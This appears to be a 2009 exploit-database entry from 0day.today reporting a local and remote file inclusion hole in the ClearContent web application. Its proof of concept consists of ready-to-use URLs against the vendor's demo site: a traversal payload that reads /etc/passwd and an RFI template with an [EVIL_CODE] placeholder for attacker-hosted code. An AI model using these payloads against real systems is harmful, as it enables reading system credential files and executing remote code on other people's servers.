[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ClearContent (image.php url) RFI/LFI Vulnerability

Author
MizoZ
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5461
Category
web applications
Date add
08-07-2009
Platform
unsorted
==================================================
ClearContent (image.php url) RFI/LFI Vulnerability
==================================================


----------------------------------------------------------------------------------------------------

  Name : ClearContent
  Site : http://www.allisclear.com/

  Demo : http://demo.allisclear.com/

----------------------------------------------------------------------------------------------------

 
  Found By : MizoZ [EvilWay Team]

  Made in  : Morocco

----------------------------------------------------------------------------------------------------


  P0c:
 
    LFI: http://demo.allisclear.com/image.php?url=../../../../../../../../../../etc/passwd
    RFI: http://demo.allisclear.com/image.php?url=[EVIL_CODE]???


 RFI needs register_globals=on;

----------------------------------------------------------------------------------------------------



#  0day.today [2024-12-24]  #